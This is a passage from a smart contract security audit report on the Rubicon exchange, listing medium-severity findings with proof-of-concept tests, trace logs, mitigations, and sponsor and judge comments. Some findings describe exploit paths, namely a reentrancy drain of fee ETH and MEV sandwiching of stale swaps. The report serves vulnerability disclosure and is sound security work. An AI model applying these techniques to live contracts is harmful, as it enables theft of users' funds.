  * @dev Returns to normal state.
  * Requirements:
  * - The contract must be paused.
function _unpause() internal virtual whenPaused {
    _paused = false;
    emit Unpaused(_msgSender());


The BathBuddy contract should implement the functions to expose the pausing mechanism. These functions should only be accessible to the owner of the contract.

function pause() external onlyOwner {

function unpause() external onlyOwner {

daoio (Rubicon) confirmed

[M-05] No deadline parameter in sellAllAmount() and buyAllAmount() functions:

Submitted by nirlin, also found by sayan.

There is no deadline parameter in these two functions. This missing feature enables pending transactions to be maliciously executed at a later point.

Proof of Concept

Consider following scnerio:

  1. Alice wants to create order of 1000DAI for 1 ETH . She signs the transaction with minOutputAmount = 0.99 ETH to allow for some slippage.
  2. The transaction is submitted to the mempool; however, Alice chose a transaction fee that is too low for miners to be interested in including her transaction in a block. The transaction stays pending in the mempool for extended periods, which could be hours, days, weeks, or even longer.
  3. The average gas fee dropped far enough for Alice’s transaction to become interesting again for miners to include it. In the meantime, the price of ETH could have drastically changed. She will still at least get 0.99 ETH due to minOutputAmount, but the DAI value of that output might be significantly lower. She has unknowingly performed a bad trade due to the pending transaction she forgot about.

An even worse way this issue can be maliciously exploited is through MEV:

  1. The swap transaction is still pending in the mempool. Average fees are still too high for miners to be interested in it. The price of ___ has gone up significantly since the transaction was signed (lets say its not dai now and some other token), meaning Alice would receive a lot more ETH when the swap is executed. But that also means that her minOutputAmount value is outdated and would allow for significant slippage.
  2. A MEV bot detects the pending transaction. Since the outdated minOutputAmount now allows for high slippage, the bot sandwiches Alice, resulting in significant profit for the bot and significant loss for Alice.

Add deadline param

bghughes (Rubicon) disputed, disagreed with severity and commented:

In my opinion, this is a good recommendation but is OOS.
Due to MEV argument - seems network-level to me - nice enhancement idea though.

HickupHH3 (judge) commented:

Ignoring the MEV argument since we’re dealing with L2s.

I think the first portion has some merit. Reference here.

Because front-running is a key aspect of AMM design, deadline is a useful tool to ensure that your tx cannot be “saved for later”.

While both Arbitrum & Optimism has minimum gas prices, network congestion could mean that the tx doesn’t get mined until they go back down (eg. trading during Arb airdrop).

It’s again a user-conditional error, which, following the reasoning in #1298, would be medium severity.

[M-06] The _matcho() is not implemented properly

Submitted by KingNFT, also found by zhuXKET and 0xDING99YA.

The _matcho() function is not implemented properly. It might revert while the taking amount is greater than the best offer’s amount, which leads to order a matching failure.

Proof of Concept

The following test script shows how to trigger the issue:

pragma solidity ^0.8.0;

import "../../contracts/compound-v2-fork/WhitePaperInterestRateModel.sol";
import "../../contracts/compound-v2-fork/ComptrollerInterface.sol";
import "../../contracts/compound-v2-fork/CErc20Delegator.sol";
import "../../contracts/compound-v2-fork/CErc20Delegate.sol";
import "../../contracts/compound-v2-fork/Comptroller.sol";
import "../../contracts/utilities/MarketAidFactory.sol";
import "../../contracts/periphery/TokenWithFaucet.sol";
import "../../contracts/utilities/MarketAid.sol";
import "../../contracts/periphery/WETH9.sol";
import "../../contracts/RubiconMarket.sol";
import "forge-std/Test.sol";

/// @notice proxy isn't used here
contract MatchingOfferNotWorking is Test {
  address public owner;
  address FEE_TO = 0x0000000000000000000000000000000000000FEE;
  address taker = address(0x1234);
  address maker = address(0x5678);
  // core contracts
  RubiconMarket market;
  // test tokens
  TokenWithFaucet RUBI;
  TokenWithFaucet USDC;

  // deployRubiconProtocolFixture()
  function setUp() public {
    owner = msg.sender;

    // deploy new Market instance and init
    market = new RubiconMarket();

    // deploy test tokens
    RUBI = new TokenWithFaucet(address(this), "RUBI", "RUBI", 18);
    USDC = new TokenWithFaucet(address(this), "Test Stablecoin", "USDC", 6);

    // add some $$$ to victim and attacker
    RUBI.transfer(maker, 1000e18);
    USDC.transfer(taker, 10000e6);

    USDC.approve(address(market), type(uint256).max);

    RUBI.approve(address(market), type(uint256).max);


  function test_MatchingOfferNotWorking() public {
   // 1. maker submits an offer for selling 1 RUBI at 100 USDC/RUBI
    uint256 makerRubiBalanceBefore = RUBI.balanceOf(maker);
    uint256 id = market.offer(1e18, RUBI, 100e6, USDC); 
    assertGt(id, 0);
    uint256 makerRubiBalanceAfter = RUBI.balanceOf(maker);
    assertEq(makerRubiBalanceBefore - makerRubiBalanceAfter, 1e18);
    // 2. now the taker submits another offer for buying 10 RUBI at 100 USDC/RUBI
    //    we expect the above selling offer to be fulfilled successfully.
    //    Meanwhile, a new 9 RUBI buying offer should be created,
    //    but actually the this offer will be reverted.
    // buying RUBI/USDC at 100 USDC/RUBI
    id = market.offer(1000e6, USDC, 10e18, RUBI); 


And the log details:

Running 1 test for test/foundry-tests/MatchingOfferNotWorking.t.sol:MatchingOfferNotWorking
[PASS] test_MatchingOfferNotWorking() (gas: 422566)
  [422566] MatchingOfferNotWorking::test_MatchingOfferNotWorking()
    ├─ [2629] TokenWithFaucet::balanceOf(0x0000000000000000000000000000000000005678) [staticcall]
    │   └─ ← 1000000000000000000000
    ├─ [0] VM::startPrank(0x0000000000000000000000000000000000005678)
    │   └─ ← ()
    ├─ [246628] RubiconMarket::offer(1000000000000000000, TokenWithFaucet: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], 100000000, TokenWithFaucet: [0xF62849F9A0B5Bf2913b396098F7c7019b51A820a])
    │   ├─ [30321] TokenWithFaucet::transferFrom(0x0000000000000000000000000000000000005678, RubiconMarket: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 1000000000000000000)
    │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000005678, to: RubiconMarket: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], value: 1000000000000000000)
    │   │   └─ ← true
    │   ├─ emit LogItemUpdate(id: 1)
    │   ├─ emit emitOffer(id: 0x0000000000000000000000000000000000000000000000000000000000000001, pair: 0x466a72696a5097346305fd11b91586c4ba7becfaf99e93d36de04eca0fe58148, maker: 0x0000000000000000000000000000000000005678, pay_gem: TokenWithFaucet: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], buy_gem: TokenWithFaucet: [0xF62849F9A0B5Bf2913b396098F7c7019b51A820a], pay_amt: 1000000000000000000, buy_amt: 100000000)
    │   ├─ emit LogSortedOffer(id: 1)
    │   └─ ← 1
    ├─ [0] VM::stopPrank()
    │   └─ ← ()
    ├─ [629] TokenWithFaucet::balanceOf(0x0000000000000000000000000000000000005678) [staticcall]
    │   └─ ← 999000000000000000000
    ├─ [0] VM::startPrank(0x0000000000000000000000000000000000001234)
    │   └─ ← ()
    ├─ [0] VM::expectRevert()
    │   └─ ← ()
    ├─ [167743] RubiconMarket::offer(1000000000, TokenWithFaucet: [0xF62849F9A0B5Bf2913b396098F7c7019b51A820a], 10000000000000000000, TokenWithFaucet: [0x2e234DAe75C793f67A35089C9d99245E1C58470b])
    │   ├─ [32321] TokenWithFaucet::transferFrom(0x0000000000000000000000000000000000001234, 0x0000000000000000000000000000000000000FEE, 9999)
    │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000001234, to: 0x0000000000000000000000000000000000000FEE, value: 9999)
    │   │   └─ ← true
    │   ├─ [25521] TokenWithFaucet::transferFrom(0x0000000000000000000000000000000000001234, 0x0000000000000000000000000000000000005678, 99990000)
    │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000001234, to: 0x0000000000000000000000000000000000005678, value: 99990000)
    │   │   └─ ← true
    │   ├─ [24995] TokenWithFaucet::transfer(0x0000000000000000000000000000000000001234, 999900000000000000)
    │   │   ├─ emit Transfer(from: RubiconMarket: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], to: 0x0000000000000000000000000000000000001234, value: 999900000000000000)
    │   │   └─ ← true
    │   ├─ emit LogItemUpdate(id: 1)
    │   ├─ emit emitTake(id: 0x0000000000000000000000000000000000000000000000000000000000000001, pair: 0x466a72696a5097346305fd11b91586c4ba7becfaf99e93d36de04eca0fe58148, taker: 0x0000000000000000000000000000000000001234, maker: 0x0000000000000000000000000000000000005678, pay_gem: TokenWithFaucet: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], buy_gem: TokenWithFaucet: [0xF62849F9A0B5Bf2913b396098F7c7019b51A820a], take_amt: 999900000000000000, give_amt: 99990000)
    │   ├─ emit emitFee(id: 0x0000000000000000000000000000000000000000000000000000000000000001, taker: 0x0000000000000000000000000000000000001234, feeTo: 0x0000000000000000000000000000000000000FEE, pair: 0x466a72696a5097346305fd11b91586c4ba7becfaf99e93d36de04eca0fe58148, asset: TokenWithFaucet: [0xF62849F9A0B5Bf2913b396098F7c7019b51A820a], feeAmt: 9999)
    │   ├─ emit LogMatch(id: 0, amount: 1000000000000000000)
    │   ├─ [3621] TokenWithFaucet::transferFrom(0x0000000000000000000000000000000000001234, 0x0000000000000000000000000000000000000FEE, 0)
    │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000001234, to: 0x0000000000000000000000000000000000000FEE, value: 0)
    │   │   └─ ← true
    │   ├─ [3621] TokenWithFaucet::transferFrom(0x0000000000000000000000000000000000001234, 0x0000000000000000000000000000000000005678, 9999)
    │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000001234, to: 0x0000000000000000000000000000000000005678, value: 9999)
    │   │   └─ ← true
    │   ├─ [3095] TokenWithFaucet::transfer(0x0000000000000000000000000000000000001234, 99990000000000)
    │   │   ├─ emit Transfer(from: RubiconMarket: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], to: 0x0000000000000000000000000000000000001234, value: 99990000000000)
    │   │   └─ ← true
    │   ├─ emit LogItemUpdate(id: 1)
    │   ├─ emit emitTake(id: 0x0000000000000000000000000000000000000000000000000000000000000001, pair: 0x466a72696a5097346305fd11b91586c4ba7becfaf99e93d36de04eca0fe58148, taker: 0x0000000000000000000000000000000000001234, maker: 0x0000000000000000000000000000000000005678, pay_gem: TokenWithFaucet: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], buy_gem: TokenWithFaucet: [0xF62849F9A0B5Bf2913b396098F7c7019b51A820a], take_amt: 99990000000000, give_amt: 9999)
    │   ├─ emit emitFee(id: 0x0000000000000000000000000000000000000000000000000000000000000001, taker: 0x0000000000000000000000000000000000001234, feeTo: 0x0000000000000000000000000000000000000FEE, pair: 0x466a72696a5097346305fd11b91586c4ba7becfaf99e93d36de04eca0fe58148, asset: TokenWithFaucet: [0xF62849F9A0B5Bf2913b396098F7c7019b51A820a], feeAmt: 0)
    │   ├─ emit LogMatch(id: 0, amount: 100000000000000)
    │   └─ ← "EvmError: Revert"
    ├─ [0] VM::stopPrank()
    │   └─ ← ()
    └─ ← ()

Test result: ok. 1 passed; 0 failed; finished in 2.67ms

Let’s take a look at this line, we find the actual take_amt is 0.9999e18 RUBI, rather than the expected 1e18; the difference is exact the 0.01% of fee.

emit emitTake(id: 0x0000000000000000000000000000000000000000000000000000000000000001,
 pair: 0x466a72696a5097346305fd11b91586c4ba7becfaf99e93d36de04eca0fe58148,
 taker: 0x0000000000000000000000000000000000001234,
 maker: 0x0000000000000000000000000000000000005678,
 pay_gem: TokenWithFaucet: [0x2e234DAe75C793f67A35089C9d99245E1C58470b],
 buy_gem: TokenWithFaucet: [0xF62849F9A0B5Bf2913b396098F7c7019b51A820a],
 take_amt: 999900000000000000, 
give_amt: 99990000)

Back to the source code, we can see the issue arises on L1313 of _matcho(), where m_pay_amt should be something like m_pay_amt + fee.

File: contracts\RubiconMarket.sol
1273:     function _matcho(
1274:         uint256 t_pay_amt, //taker sell how much
1275:         ERC20 t_pay_gem, //taker sell which token
1276:         uint256 t_buy_amt, //taker buy how much
1277:         ERC20 t_buy_gem, //taker buy which token
1278:         uint256 pos, //position id
1279:         bool rounding, //match "close enough" orders?
1280:         address owner,
1281:         address recipient
1282:     ) internal returns (uint256 id) {
1283:         uint256 best_maker_id; //highest maker id
1284:         uint256 t_buy_amt_old; //taker buy how much saved
1285:         uint256 m_buy_amt; //maker offer wants to buy this much token
1286:         uint256 m_pay_amt; //maker offer wants to sell this much token
1288:         // there is at least one offer stored for token pair
1289:         while (_best[address(t_buy_gem)][address(t_pay_gem)] > 0) {
1290:             best_maker_id = _best[address(t_buy_gem)][address(t_pay_gem)];
1291:             m_buy_amt = offers[best_maker_id].buy_amt;
1292:             m_pay_amt = offers[best_maker_id].pay_amt;
1313:             buy(best_maker_id, min(m_pay_amt, t_buy_amt));
1314:             emit LogMatch(id, min(m_pay_amt, t_buy_amt));
1315:             t_buy_amt_old = t_buy_amt;
1316:             t_buy_amt = sub(t_buy_amt, min(m_pay_amt, t_buy_amt));
1317:             t_pay_amt = mul(t_buy_amt, t_pay_amt) / t_buy_amt_old;
1319:             if (t_pay_amt == 0 || t_buy_amt == 0) {
1320:                 break;
1321:             }
1322:         }
1341:     }

See PoC

daoio (Rubicon) confirmed via duplicate issue #1336

[M-07] Missing a check for minimum sell amount at the make function

Submitted by Evo, also found by said.

There is a check for _dust amount inside offer function at L835 but not inside the other offer function being called by the make function at L511.

The make function will not avoid dust offers.

Proof of Concept
There is no check for _dust inside offer function. The minimum sell amount should be set for a token to avoid dust offers as the concept applies.

    function offer(
        uint256 pay_amt,
        ERC20 pay_gem,
        uint256 buy_amt,
        ERC20 buy_gem,
        address owner,
        address recipient
    ) public virtual can_offer synchronized returns (uint256 id) {
        require(uint128(pay_amt) == pay_amt);
        require(uint128(buy_amt) == buy_amt);
        require(pay_amt > 0);
        require(pay_gem != ERC20(address(0))); /// @dev Note, modified from: require(pay_gem != ERC20(0x0)) which compiles in 0.7.6
        require(buy_amt > 0);
        require(buy_gem != ERC20(address(0))); /// @dev Note, modified from: require(buy_gem != ERC20(0x0)) which compiles in 0.7.6
        require(pay_gem != buy_gem);

        OfferInfo memory info;
        info.pay_amt = pay_amt;
        info.pay_gem = pay_gem;
        info.buy_amt = buy_amt;
        info.buy_gem = buy_gem;
        info.recipient = recipient;
        info.owner = owner;
        info.timestamp = uint64(block.timestamp);
        id = _next_id();
        offers[id] = info;

        require(pay_gem.transferFrom(msg.sender, address(this), pay_amt));

        emit LogItemUpdate(id);

        /// emit LogMake(
        ///     bytes32(id),
        ///     keccak256(abi.encodePacked(pay_gem, buy_gem)),
        ///     msg.sender,
        ///     pay_gem,
        ///     buy_gem,
        ///     uint128(pay_amt),
        ///     uint128(buy_amt),
        ///     uint64(block.timestamp)
        /// );

        emit emitOffer(
            keccak256(abi.encodePacked(pay_gem, buy_gem)),

As you can see, it is also applied in the other offer function at L835.

   require(_dust[address(pay_gem)] <= pay_amt);

Add the check condition below to the offer function that called the make function:

   require(_dust[address(pay_gem)] <= pay_amt);

daoio (Rubicon) confirmed


Submitted by Udsen, also found by 0xkazim, pipoca, 0xNineDec and 0xnacho.

Reentrancy attack could happen if _feeTo is a malicious contract and has recieve() function implemented in _feeTo contract. FeeWrapper._chargeFeePayable() function is used to send the _feeAmount of ETH to the _feeTo address.

Consider that FeeWrapper._chargeFeePayable() is called by the FeeWrapper._rubicallPayable() function with the necessary _feeParams input parameter, and the following scenario can occur:

  1. The call to (bool OK, ) = payable(_feeTo).call{value: _feeAmount}("") is made. Lets assume the _totalAmount = 1ETH and _feeAmount = 0.1ETH initially.
  2. _feeTo contract has the recieve() function implemented in it.
  3. It reenters the FeeWrapper contract by calling the rubicallPayable() function by sending 0.01ETH as msg.value.
  4. It sets the _feeParams.totalAmount = 0.01ETH and _feeParams.feeAmount = 0.1ETH in the call to rubicallPayable().
  5. FeeWrapper.chargeFeePayable() will be called again by the rubicallPayable() function.
  6. (bool OK, ) = payable(_feeTo).call{value: _feeAmount}(""); will be called and Tx will pass since there is enough ETH in the contract from the previous deposit.
  7. Again _feeParams.feeAmount = 0.1ETH will be transferred to the _feeTo address.
  8. This can be continued till there is enough ETH in the contract.
  9. This happens as there is no check to make sure msg.value > _feeAmount before the low level call to the _feeTo address.

Proof of Concept

function _chargeFeePayable(
    FeeParams memory _feeParams
) internal returns (uint256 _msgValue) {
    // _feeToken is ETH
    uint256 _totalAmount = _feeParams.totalAmount;
    uint256 _feeAmount = _feeParams.feeAmount;
    address _feeTo = _feeParams.feeTo;
    require(msg.value == _totalAmount, "FeeWrapper: not enough ETH sent");

    // transfer fee to the 3rd party protocol
    (bool OK, ) = payable(_feeTo).call{value: _feeAmount}("");
	require(OK, "ETH transfer failed");
    _msgValue = msg.value - _feeAmount;

function _rubicallPayable(
    CallParams memory _params
) internal returns (bytes memory) {
    // charge fee from feeParams
    uint256 _msgValue = _chargeFeePayable(_params.feeParams);

    (bool _OK, bytes memory _data) ={value: _msgValue}(
        bytes.concat(_params.selector, _params.args)

    require(_OK, "low-level call to the router failed");

    return _data;

Tools Used

Manual Review and VSCode

Two options can be recommended to mitigate this issue:

  1. Add a reentrancy guard. Openzeppelin ReentrancyGuard.sol can be used, and nonReentrant modifier can be added to both FeeWrapper._chargeFeePayable() and FeeWrapper._rubicallPayable() functions.
  2. Check that the msg.value > _feeAmount before the low level call to the _feeTo address is made. In that case, there is no gain to the _feeTo malicious contract, since the value it’s sending via msg.value is always greater than the _feeAmount which can be stolen via reentrancy attack.

daoio (Rubicon) confirmed via duplicate issue #495

[M-09] Use of block.number leads to incorrect interest calculations

Submitted by joestakey, also found by 0xkazim, nirlin, VAD37 and ladboy233.

The interests that need to be paid upon closing a position are computed as follows:

File: contracts/utilities/poolsUtility/Position.sol
322: function _calculateDebt(
323:         address _bathToken,
324:         uint256 _startBlock,
325:         uint256 _borrowedAmount
326:     ) internal view returns (uint256 _debt) {
327:         uint256 _blockDelta = block.number - _startBlock;
329:         uint256 _interest = (
330:             (_borrowedAmount).mul(borrowRate(_bathToken).mul(_blockDelta))
331:         ).div(10 ** 18);
332:         _debt = _borrowedAmount.add(_interest);
333:     }

The interest rate is computed using the block delta, between block.number and the starting block.

The issue is that the block production on Optimism is currently not fixed:

each transaction on L2 is placed in a separate block and blocks are NOT produced at a constant rate

Proof of Concept

Run the following command several times in the repo, using an optimism rpc url:

cast block-number --rpc-url YOUR_OPTIMISM_RPC_URL

You will see that the blocks are not produced at a constant rate.


Interest rates are currently manipulable and will result in users having to repay more interest than expected upon closing positions.


Use block.timestamp instead of block.number for interest calculation. It will involve a lot of refactoring as the Compound contracts bathToken currently inherits from using a “per block” system.

daoio (Rubicon) acknowledged via duplicate issue #1212

HickupHH3 (judge) commented via duplicate issue #1212:

This issue is dependent on how the borrowRatePerBlock (and supply rate) is configured.

If there’s proof that the sponsor configures it with the assumption that each block is produced every 12s on mainnet, then it’s High severity. On the other hand, if it can be shown that they have configured the rates to be compatible with Optimism & Arbitrum, then it’s a low issue.

Considering it to be Medium severity because of this external requirement.

[M-10] Incorrect reward duration extension in notifyRewardAmount function

Submitted by bytes032, also found by J4de.

This issue can lead to extending the reward duration beyond the intended time period, causing rewards to be distributed over a longer duration than initially planned. This could result in users receiving smaller rewards over time, which may not align with the project’s goals or user expectations.

Proof of Concept

The notifyRewardAmount function updates the reward rate and the period finish time for a given rewards token.

It first checks if the current block timestamp is greater than or equal to the period finish time for the given rewards token. If the reward period has passed, the reward rate is set by dividing the reward amount by the rewardsDuration for the rewards token. If the reward period has not yet passed, the remaining time and the leftover reward amount are calculated based on the current reward rate. The new reward rate is then set by adding the leftover amount to the new reward amount and dividing by the rewardsDuration.

Finally, the function then updates the lastUpdateTime for the rewards token to the current block timestamp and increments the periodFinish time by adding the rewardsDuration.

This means if there’s an ongoing reward duration and its halfway done, adding new rewards will automatically increase the reward duration by the initial time period.

        // @audit always increments 
        periodFinish[address(rewardsToken)] = block.timestamp.add(

After discussing with the sponsor, they acknowledged that this behavior was not expected.

Modify the notifyRewardAmount function to only extend the reward duration when necessary.

daoio (Rubicon) confirmed

HickupHH3 (judge) commented:

After discussing with the sponsor, they acknowledged that this behavior was not expected.

I’m quite surprised by this, given how notifyRewardAmount() is supposed to work when topping up rewards. It will require significant modifications to a battle-tested codebas,e which could introduce new bugs.

[M-11] Calling ExpiringMarket.stop and ExpiringMarket.isClosed functions cannot pause any functionlities of the market

Submitted by rbserver, also found by halden, McToady, JC, karanctf, tnevler, hunter_w3b, dec3ntraliz3d, Viktor_Cortess, lukris02, Udsen, Ace-30, Ocean_Sky, AlexCzm, R2, darksnow, fs0c, ktg, carrotsmuggler, MatricksDeCoder, whoismatthewmc1, Juntao, Kaysoft, tallo, Banditx0x, mrpathfindr, bearonbike, mrpathfindr, descharre, Shubham, said, ljmanini, MalfurionWhitehat, btk, Dug, sces60107, ginlee, iliyaniliev, dacian, koxuan, pavankv and ravikiranweb3.

Although the following ExpiringMarket.stop function can be called by the RubiconMarket contract’s owner, calling it does not stop the market because stopped is not used at all in the protocol for pausing any of the market’s functionalities.

    function stop() external auth {
        stopped = true;

Moreover, the following ExpiringMarket.isClosed function always returns false. This means that the market cannot be closed. Since this ExpiringMarket.isClosed function is called in the ExpiringMarket.can_offer and ExpiringMarket.can_buy modifiers below, these modifiers’ require(!isClosed()) will always pass, and new offers and buys are always allowed. Similarly, the below RubiconMarket.can_cancel modifier’s require statement’s isClosed() check is always false so the situation, where the user wants to cancel an offer when the market is closed, does not exist at all.

    function isClosed() public pure returns (bool closed) {
        return false;

    /// @dev After close_time has been reached, no new offers are allowed.
    modifier can_offer() override {

    /// @dev After close, no new buys are allowed.
    modifier can_buy(uint256 id) override {

    // // After close, anyone can cancel an offer
    modifier can_cancel(uint256 id) override {
        require(isActive(id), "Offer was deleted or taken, or never existed.");
            isClosed() ||
                msg.sender == getOwner(id) ||
                id == dustId ||
                (msg.sender == getRecipient(id) && getOwner(id) == address(0)),
            "Offer can not be cancelled because user is not owner, and market is open, and offer sells required amount of tokens."

Since calling the ExpiringMarket.stop and ExpiringMarket.isClosed functions cannot close or stop the market, the RubiconMarket contract’s owner is unable to pause any functionlities of the market and prevented any unintended outflow and loss of user funds when an emergency occurs, such as if the protocol gets attacked and hacked.

Proof of Concept

The following steps can occur for the described scenario.

  1. The protocol is hacked so the RubiconMarket contract’s owner calls the ExpiringMarket.stop function as an attempt to pause the functionalities of the market.
  2. After the ExpiringMarket.stop function is called, none of the market’s functionalities are paused because stopped is not used at all in the protocol for pausing any of the market’s functionalities and the ExpiringMarket.isClosed function always returns false.
  3. As a result, the attacker can transfer user funds out from the protocol, and such user funds are lost.

Tools Used


The ExpiringMarket.stop function can be updated to set stopped to true or false by the RubiconMarket contract’s owner. The ExpiringMarket.isClosed function can then be updated to return stopped. This enables the RubiconMarket contract’s owner to pause and unpause the market’s functionalities when needed.

daoio (Rubicon) acknowledged and commented:

We will remove this ExpiringMarket stuff, keeping only stopped storage var.

HickupHH3 (judge) commented:

Best written up report regarding impact.

[M-12] User can possess less value than before when V2Migrator.migrate function is called to give up bathTokenV1 tokens and hold bathTokenV2 tokens

Submitted by rbserver, also found by Arz, karanctf, 0xnacho, 0xnev, and zaevlad.

Calling the following V2Migrator.migrate function executes uint256 amountWithdrawn = bathTokenV1.withdraw(bathBalance).

    function migrate(IBathToken bathTokenV1) external {
        //////////////// V1 WITHDRAWAL ////////////////
        uint256 bathBalance = bathTokenV1.balanceOf(msg.sender);
        require(bathBalance > 0, "migrate: ZERO AMOUNT");

        /// @dev approve first
        bathTokenV1.transferFrom(msg.sender, address(this), bathBalance);

        // withdraw all tokens from the pool
        uint256 amountWithdrawn = bathTokenV1.withdraw(bathBalance);

        //////////////// V2 DEPOSIT ////////////////
        IERC20 underlying = bathTokenV1.underlyingToken();
        address bathTokenV2 = v1ToV2Pools[address(bathTokenV1)];

        underlying.approve(bathTokenV2, amountWithdrawn);
            CErc20Interface(bathTokenV2).mint(amountWithdrawn) == 0,
            "migrate: MINT FAILED"
        /// @dev v2 bathTokens shouldn't be sent to this contract from anywhere other than this function

Then, calling bathTokenV1.withdraw(bathBalance) further calls the following BathTokenV1._withdraw function, which executes amountWithdrawn = r.sub(_fee) so amountWithdrawn has _fee deducted. When underlyingToken.safeTransfer(receiver, amountWithdrawn) is executed, such amountWithdrawn is transferred to the V2Migrator contract.

    function _withdraw(
        uint256 _shares,
        address receiver
    ) internal returns (uint256 amountWithdrawn) {
        uint256 r = (underlyingBalance().mul(_shares)).div(totalSupply);
        _burn(msg.sender, _shares);
        uint256 _fee = r.mul(feeBPS).div(10000);
        // If FeeTo == address(0) then the fee is effectively accrued by the pool
        if (feeTo != address(0)) {
            underlyingToken.safeTransfer(feeTo, _fee);
        amountWithdrawn = r.sub(_fee);
        underlyingToken.safeTransfer(receiver, amountWithdrawn);

Back in the V2Migrator.migrate function, amountWithdrawn that already has _fee deducted is used to call CErc20Interface(bathTokenV2).mint(amountWithdrawn), and the minted bathTokenV2 tokens are then transferred to the user. The whole migration process basically makes the user send their bathTokenV1 tokens in exchange of the bathTokenV2 tokens accordingly, so the value owned by the user before and after the migration should be the same. However, after deducting _fee from amountWithdrawn, which is used to mint the new bathTokenV2 tokens, has become less than the underlying token value that is equivalent to the user’s original bathTokenV1 token balance. Although the user should own the same value either holding the bathTokenV1 tokens before the migration or bathTokenV2 tokens after the migration, the user is forced to pay _fee and possess less value than before the V2Migrator.migrate function is called to give up bathTokenV1 tokens and hold bathTokenV2 tokens. Losing value because of the migration is unfair to the user.

Proof of Concept

The following steps can occur for the described scenario.

  1. The bathTokenV1 tokens owned by Alice are worth 1000 USDC.
  2. Alice calls the V2Migrator.migrate function to migrate her bathTokenV1 tokens to bathTokenV2 tokens.
  3. When the V2Migrator.migrate function is called, a fee of 10 USDC is transferred to feeTo so the bathTokenV2 tokens minted to Alice are worth only 990 USDC.
  4. As a result, Alice loses 10 USDC because of the migration, even though she should own the same value either holding the bathTokenV1 tokens before the migration or bathTokenV2 tokens after the migration.

Tools Used


The BathHouse contract corresponding to bathHouse used in the BathToken V1 proxy contract can be upgraded to allow its BathHouse.setBathTokenFeeBPS function, which its current implementation is shown below, to be additionally callable by the V2Migrator contract. Then, the V2Migrator.migrate function can be updated to call this BathHouse.setBathTokenFeeBPS function to change the BathToken V1 proxy contract’s feeBPS to 0 before calling bathTokenV1.withdraw(bathBalance) and restore the BathToken V1 proxy contract’s feeBPS to its original value after calling bathTokenV1.withdraw(bathBalance).

    function setBathTokenFeeBPS(address bathToken, uint256 newBPS)

daoio (Rubicon) acknowledged

[M-13] Calling Position._marketBuy and Position._marketSell functions that calculate _fee by dividing by 10000 can cause incorrect calculations

Submitted by rbserver, also found by zhuXKET, Josiah, Aymen0909, immeas, immeas, teddav, joestakey, Ruhum, cducrest, markus_ether, markus_ether, Nyx, dec3ntraliz3d, Viktor_Cortess, __141345__, Toshii, 0xDING99YA, sashik_eth, Madalad, peanuts, AlexCzm, R2, 0xfusion, SpicyMeatball, sinarette, cccz, xmxanuel, said, T1MOH, RaymondFam, MalfurionWhitehat, ljmanini, volodya, 3agle, sces60107, anodaram, ckksec, 0xnev, dacian and volodya.

Calling the following Position._marketBuy function executes uint256 _fee = _maxFill.mul(rubiconMarket.getFeeBPS()).div(10000), and calling the Position._marketSell function below executes uint256 _fee = _minFill.mul(_feeBPS).div(10000) and _fee = _payAmount.mul(_feeBPS).div(10000); in these _fee calculations, 10000 is used as the denominator.

    function _marketBuy(
        address _asset,
        address _quote,
        uint256 _maxFill
    ) internal {
        uint256 _fee = _maxFill.mul(rubiconMarket.getFeeBPS()).div(10000);
        uint256 _buyAmount = rubiconMarket.getBuyAmount(
        IERC20(_quote).approve(address(rubiconMarket), _maxFill);


    function _marketSell(
        address _asset,
        address _quote,
        uint256 _minFill
    ) internal {
        uint256 _feeBPS = rubiconMarket.getFeeBPS();
        uint256 _fee = _minFill.mul(_feeBPS).div(10000);
        uint256 _payAmount = rubiconMarket.getPayAmount(
        uint256 _assetBalance = IERC20(_asset).balanceOf(address(this));

        /// @dev recalculate fee in _asset form
        _fee = _payAmount.mul(_feeBPS).div(10000);

        if (_assetBalance < _payAmount) {



When calling the Position._marketBuy and Position._marketSell functions, the following function will be eventually called. Calling the function executes uint256 fee = mul(spend, feeBPS) / 100_000, where 100_000, which is not 10000, is the denominator.

    function buy(
        uint256 id,
        uint256 quantity
    ) public virtual can_buy(id) synchronized returns (bool) {
        OfferInfo memory _offer = offers[id];
        uint256 spend = mul(quantity, _offer.buy_amt) / _offer.pay_amt;

        require(uint128(spend) == spend, "spend is not an int");
        require(uint128(quantity) == quantity, "quantity is not an int");

        ///@dev For backwards semantic compatibility.
        if (
            quantity == 0 ||
            spend == 0 ||
            quantity > _offer.pay_amt ||
            spend > _offer.buy_amt
        ) {
            return false;

        offers[id].pay_amt = sub(_offer.pay_amt, quantity);
        offers[id].buy_amt = sub(_offer.buy_amt, spend);

        /// @dev Fee logic added on taker trades
        uint256 fee = mul(spend, feeBPS) / 100_000;
            _offer.buy_gem.transferFrom(msg.sender, feeTo, fee),
            "Insufficient funds to cover fee"

Because the Position._marketBuy and Position._marketSell functions calculate _fee through dividing by 10000 but the function calculates fee through dividing by 100_000, _fee and fee are different. This can cause incorrect calculations when calling the Position contract’s functions that eventually call the Position._marketBuy or Position._marketSell function, and users can lose tokens that they are entitled to, as a result. For example, when calling the Position.buyAllAmountWithLeverage function, the user should receive more asset tokens when the Position._marketBuy function calculates _fee through dividing by 100_000 than when the Position._marketBuy function calculates _fee through dividing by 10000. Thus, since the Position._marketBuy function currently calculates _fee through dividing by 10000, the user loses some asset tokens that they are entitled to.

Proof of Concept

First, please add the following changes of quote and asset tokens when Position._marketBuy function calculates _fee through dividing by 10000 test in the Long positions describe block in test\hardhat-tests\leverage-wrapper.ts. This test will pass to show the number of asset tokens received by the user who calls the Position.buyAllAmountWithLeverage function when the Position._marketBuy function calculates _fee through dividing by 10000.

      it.only("changes of quote and asset tokens when Position._marketBuy function calculates _fee through dividing by 10000", async function () {
        const { owner, testCoin, testStableCoin, Position} =
          await loadFixture(deployPoolsUtilityFixture);

        // testCoin is quote token when calling Position.buyAllAmountWithLeverage function
        const ownerTestCoinBalanceBefore = await testCoin.balanceOf(owner.address);

